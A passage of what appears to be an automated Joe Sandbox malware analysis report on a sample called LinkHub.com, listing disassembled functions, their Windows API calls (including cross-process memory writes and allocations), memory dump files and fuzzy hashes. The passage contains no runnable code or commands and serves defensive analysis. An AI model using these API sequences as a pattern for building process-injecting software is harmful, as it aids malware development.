                                                                    • API String ID: 842720411-0
                                                                    • Opcode ID: b0220a1faa96e4d30e4d176ab8ec79452f6f73d991c248457be3f5a222f009ae
                                                                    • Instruction ID: 9fc5c62c6d4fa2d35a883a45e96f30d7efeb2f251a4442ac3321d69afdba7ec2
                                                                    • Opcode Fuzzy Hash: b0220a1faa96e4d30e4d176ab8ec79452f6f73d991c248457be3f5a222f009ae
                                                                    • Instruction Fuzzy Hash: EB018CB9601305BFDB114FA5DC88E6A3BBEEF883A4B250416FD49C3360DA31DD409A70
                                                                    Function 00CD1960 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00CD1976
                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00CD1982
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00CD1991
                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00CD1998
                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00CD19AE
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                    • String ID:
                                                                    • API String ID: 44706859-0
                                                                    • Opcode ID: 12120a2bcfa53db7a650dca54276af34132465d6c65e9405ddebc5bef0e82930
                                                                    • Instruction ID: 0ff6559c9c1e83182a5c7c63cb8132bccd49c4dc5cc5d05674a48d4e04f4ac80
                                                                    • Opcode Fuzzy Hash: 12120a2bcfa53db7a650dca54276af34132465d6c65e9405ddebc5bef0e82930
                                                                    • Instruction Fuzzy Hash: 49F06275200301BBD7214FA4EC99F563B6EEF897A0F140416FE49C7360CA70DA008A70
                                                                    Function 00CD1900 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00CD1916
                                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00CD1922
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00CD1931
                                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00CD1938
                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00CD194E
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                    • String ID:
                                                                    • API String ID: 44706859-0
                                                                    • Opcode ID: 0a588debb5ff9b4643a022ed504af9d7fbba222e8b48108b0541546dd27a1404
                                                                    • Instruction ID: 912df39cf7820a7f096ef59f9bdaff316871355eb7cde9d1f4bdb5ba6ed73322
                                                                    • Opcode Fuzzy Hash: 0a588debb5ff9b4643a022ed504af9d7fbba222e8b48108b0541546dd27a1404
                                                                    • Instruction Fuzzy Hash: B1F04975200302BBEB210FA59C5AF563BAEEF897A0F140416FA49D73A0CA70DC008A70
                                                                    Function 00CE0CB6 Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CloseHandle.KERNEL32(?,?,?,?,00CE0B24,?,00CE3D41,?,00000001,00CB3AF4,?), ref: 00CE0CCB
                                                                    • CloseHandle.KERNEL32(?,?,?,?,00CE0B24,?,00CE3D41,?,00000001,00CB3AF4,?), ref: 00CE0CD8
                                                                    • CloseHandle.KERNEL32(?,?,?,?,00CE0B24,?,00CE3D41,?,00000001,00CB3AF4,?), ref: 00CE0CE5
                                                                    • CloseHandle.KERNEL32(?,?,?,?,00CE0B24,?,00CE3D41,?,00000001,00CB3AF4,?), ref: 00CE0CF2
                                                                    • CloseHandle.KERNEL32(?,?,?,?,00CE0B24,?,00CE3D41,?,00000001,00CB3AF4,?), ref: 00CE0CFF
                                                                    • CloseHandle.KERNEL32(?,?,?,?,00CE0B24,?,00CE3D41,?,00000001,00CB3AF4,?), ref: 00CE0D0C
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandle
                                                                    • String ID:
                                                                    • API String ID: 2962429428-0
                                                                    • Opcode ID: 097a611207f261d8f24597bfe657c8c9fe6dc75355b5fc358997bedbf5130a1e
                                                                    • Instruction ID: 9abe0401daf88605b606023878a512d9b3dda9e2af641ea1e687db6056d08cd4
                                                                    • Opcode Fuzzy Hash: 097a611207f261d8f24597bfe657c8c9fe6dc75355b5fc358997bedbf5130a1e
                                                                    • Instruction Fuzzy Hash: E2019071800B559FCB30AFA6D980816F7F5BF503153258A3ED1A652921C7B0AA85DF81
                                                                    Function 00CD65AB Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00CD65BF
                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00CD65D6
                                                                    • MessageBeep.USER32(00000000), ref: 00CD65EE
                                                                    • KillTimer.USER32(?,0000040A), ref: 00CD660A
                                                                    • EndDialog.USER32(?,00000001), ref: 00CD6624
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                    • String ID:
                                                                    • API String ID: 3741023627-0
                                                                    • Opcode ID: 341ecb7bdfd7ae4a859a1f792075f39dc31afb6fb610a937266558cfda6936c0
                                                                    • Instruction ID: 3cb2c6aa88b5f06cec82ad7f47d4b9b817334bdf34dc79f6174fcce85c46986c
                                                                    • Opcode Fuzzy Hash: 341ecb7bdfd7ae4a859a1f792075f39dc31afb6fb610a937266558cfda6936c0
                                                                    • Instruction Fuzzy Hash: 1301A930540708ABEB305F60DD4EB967BB9FF04705F40055BB29BA21E1EBF5AA85CB50
                                                                    Function 00CADABA Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _free.LIBCMT ref: 00CADAD2
                                                                      • Part of subcall function 00CA2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00CADB51,?,00000000,?,00000000,?,00CADB78,?,00000007,?,?,00CADF75,?), ref: 00CA2D4E
                                                                      • Part of subcall function 00CA2D38: GetLastError.KERNEL32(?,?,00CADB51,?,00000000,?,00000000,?,00CADB78,?,00000007,?,?,00CADF75,?,?), ref: 00CA2D60
                                                                    • _free.LIBCMT ref: 00CADAE4
                                                                    • _free.LIBCMT ref: 00CADAF6
                                                                    • _free.LIBCMT ref: 00CADB08
                                                                    • _free.LIBCMT ref: 00CADB1A
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 24a2296174c47c988f3634280122cfb97134e27464afa338c709b93ef3341bb9
                                                                    • Instruction ID: aa56972544b3d3e94ac54f04d69210244fea3ebdaab9721c33463f0e5b043142
                                                                    • Opcode Fuzzy Hash: 24a2296174c47c988f3634280122cfb97134e27464afa338c709b93ef3341bb9
                                                                    • Instruction Fuzzy Hash: D4F01233944316AB8624EB68F981D1A77EEEE067147950C05F05BE7A01CB30FD80DE74
                                                                    Function 00CA2610 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _free.LIBCMT ref: 00CA262E
                                                                      • Part of subcall function 00CA2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00CADB51,?,00000000,?,00000000,?,00CADB78,?,00000007,?,?,00CADF75,?), ref: 00CA2D4E
                                                                      • Part of subcall function 00CA2D38: GetLastError.KERNEL32(?,?,00CADB51,?,00000000,?,00000000,?,00CADB78,?,00000007,?,?,00CADF75,?,?), ref: 00CA2D60
                                                                    • _free.LIBCMT ref: 00CA2640
                                                                    • _free.LIBCMT ref: 00CA2653
                                                                    • _free.LIBCMT ref: 00CA2664
                                                                    • _free.LIBCMT ref: 00CA2675
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 96bdcd73e83752263c7d9764b8c96d4f8804a262cfad944d8ed07fe944f45f59
                                                                    • Instruction ID: 0412ea08fd3caca3dede10d74331adb85ceb6c687a1f504f18aa8956569cd12c
                                                                    • Opcode Fuzzy Hash: 96bdcd73e83752263c7d9764b8c96d4f8804a262cfad944d8ed07fe944f45f59
                                                                    • Instruction Fuzzy Hash: 5EF0DA7D8027329B8706AF58FC418583B65BF27765345090AF414E6376C7711952FFA8
                                                                    Function 00CA12B7 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: __freea$_free
                                                                    • String ID: a/p$am/pm
                                                                    • API String ID: 3432400110-3206640213
                                                                    • Opcode ID: da4f389b586e08242f7d2ce821b68186817ba5446653f2e6623628c475d3c17a
                                                                    • Instruction ID: c64abf60c62d31a7f6085e455e66446d8a9eaf7af594719c4dafa8e16e11e854
                                                                    • Opcode Fuzzy Hash: da4f389b586e08242f7d2ce821b68186817ba5446653f2e6623628c475d3c17a
                                                                    • Instruction Fuzzy Hash: 58D1DF759102079EDB289F69C8556FAB7B1FF07308F2C415AED22DB290D7359E80CBA1
                                                                    Function 00CD3063 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00CDBDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00CD2B1D,?,?,00000034,00000800,?,00000034), ref: 00CDBDF4
                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00CD30AD
                                                                      • Part of subcall function 00CDBD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00CD2B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 00CDBDBF
                                                                      • Part of subcall function 00CDBCF1: GetWindowThreadProcessId.USER32(?,?), ref: 00CDBD1C
                                                                      • Part of subcall function 00CDBCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00CD2AE1,00000034,?,?,00001004,00000000,00000000), ref: 00CDBD2C
                                                                      • Part of subcall function 00CDBCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00CD2AE1,00000034,?,?,00001004,00000000,00000000), ref: 00CDBD42
                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00CD311A
                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00CD3167
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                    • String ID: @
                                                                    • API String ID: 4150878124-2766056989
                                                                    • Opcode ID: 87fa549fad0e3257aeacb686834dc67a365882302bc224eceb212a2472126ccf
                                                                    • Instruction ID: bd5cc65d525ab11af7bc9203733088c604d99157d37897924d05c07be87c17c2
                                                                    • Opcode Fuzzy Hash: 87fa549fad0e3257aeacb686834dc67a365882302bc224eceb212a2472126ccf
                                                                    • Instruction Fuzzy Hash: 94412A72900218BEDB10DFA4CD81ADEBBB9EF49700F004096FA55B7285DB706F85DB61
                                                                    Function 00CA1A9E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com,00000104), ref: 00CA1AD9
                                                                    • _free.LIBCMT ref: 00CA1BA4
                                                                    • _free.LIBCMT ref: 00CA1BAE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _free$FileModuleName
                                                                    • String ID: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com
                                                                    • API String ID: 2506810119-1604394757
                                                                    • Opcode ID: 226a469e4924590325442e9fcd9312c478a2a64b7499ac3aa99721fed2ae243a
                                                                    • Instruction ID: d1ec0d8fbb9764ea0b3553cb80cefb8876414000764f44f6e56f60830b77495d
                                                                    • Opcode Fuzzy Hash: 226a469e4924590325442e9fcd9312c478a2a64b7499ac3aa99721fed2ae243a
                                                                    • Instruction Fuzzy Hash: B23183B5A00219ABCB21DF99DC85D9EBBFCEB86714F1441A6F814D7211E6B04F40E7A4
                                                                    Function 00CDCB28 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00CDCBB1
                                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 00CDCBF7
                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00D429C0,011C56E0), ref: 00CDCC40
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Delete$InfoItem
                                                                    • String ID: 0
                                                                    • API String ID: 135850232-4108050209
                                                                    • Opcode ID: 10590d88ba5c9cb5211b154d6a150e6e00d3225ac572f840f8f998dc009f8ae1
                                                                    • Instruction ID: 8da05e96fa6972efdbd33643dccd7f65b750d2a6af961135d34da256d7e072ad
                                                                    • Opcode Fuzzy Hash: 10590d88ba5c9cb5211b154d6a150e6e00d3225ac572f840f8f998dc009f8ae1
                                                                    • Instruction Fuzzy Hash: 514171712043029FDB20DF24D9C5B5ABBE8AF85714F14461FFAA997391D730E904CB62
                                                                    Function 00D04EB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00D0DCD0,00000000,?,?,?,?), ref: 00D04F48
                                                                    • GetWindowLongW.USER32 ref: 00D04F65
                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00D04F75
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Long
                                                                    • String ID: SysTreeView32
                                                                    • API String ID: 847901565-1698111956
                                                                    • Opcode ID: e2f915a15c61ba57dbc9211d2a2545596dce62e34b2a978f1b88e4531615e8b8
                                                                    • Instruction ID: f614ff9a5e2bfc52500f9f5d9ca47ca436e4c158d3e8be45cfbca80326609e5a
                                                                    • Opcode Fuzzy Hash: e2f915a15c61ba57dbc9211d2a2545596dce62e34b2a978f1b88e4531615e8b8
                                                                    • Instruction Fuzzy Hash: E4317EB1204206AFDB218E78DC45FEA7BA9EF48334F244715FA79E21E0D770AC519760
                                                                    Function 00CF3AAB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00CF3DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00CF3AD4,?,?), ref: 00CF3DD5
                                                                    • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00CF3AD7
                                                                    • _wcslen.LIBCMT ref: 00CF3AF8
                                                                    • htons.WSOCK32(00000000,?,?,00000000), ref: 00CF3B63
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                    • String ID: 255.255.255.255
                                                                    • API String ID: 946324512-2422070025
                                                                    • Opcode ID: 922c45aeff5290065d9c9bc8b390f30ac4be34e41c6889da8d2076037d40ef47
                                                                    • Instruction ID: 4428c342c05ef724e1b5b5c095eec92fc6787e2f3b73712d070e53c0a23ad9ab
                                                                    • Opcode Fuzzy Hash: 922c45aeff5290065d9c9bc8b390f30ac4be34e41c6889da8d2076037d40ef47
                                                                    • Instruction Fuzzy Hash: DC31D339200289AFCB50CF68C4D5E797BE1EF14318F248159EA268B392D731EF42C762
                                                                    Function 00D04954 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00D049DC
                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00D049F0
                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00D04A14
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window
                                                                    • String ID: SysMonthCal32
                                                                    • API String ID: 2326795674-1439706946
                                                                    • Opcode ID: bb5fc6256dd3c7ded8d1aec56388f500d9e8efa8fd95f4c2efa676730c06fde4
                                                                    • Instruction ID: 505fada606039ed820b523337abeb20fb994a71d9d6a490e921fc4039ba88e53
                                                                    • Opcode Fuzzy Hash: bb5fc6256dd3c7ded8d1aec56388f500d9e8efa8fd95f4c2efa676730c06fde4
                                                                    • Instruction Fuzzy Hash: 6921BF72640219ABDF118F94DC42FEB3B69EF48728F150218FB19AB1D0D6B1E855DBA0
                                                                    Function 00D050F1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00D051A3
                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00D051B1
                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00D051B8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$DestroyWindow
                                                                    • String ID: msctls_updown32
                                                                    • API String ID: 4014797782-2298589950
                                                                    • Opcode ID: a721cb9c0df018626a422d1194a9d05e90dcd7a1378fdf478dfd24705008be1d
                                                                    • Instruction ID: b2b27eb95e2ef0ef302ea02c18436ce085799e8c75465919bc6a2dd0eb914adb
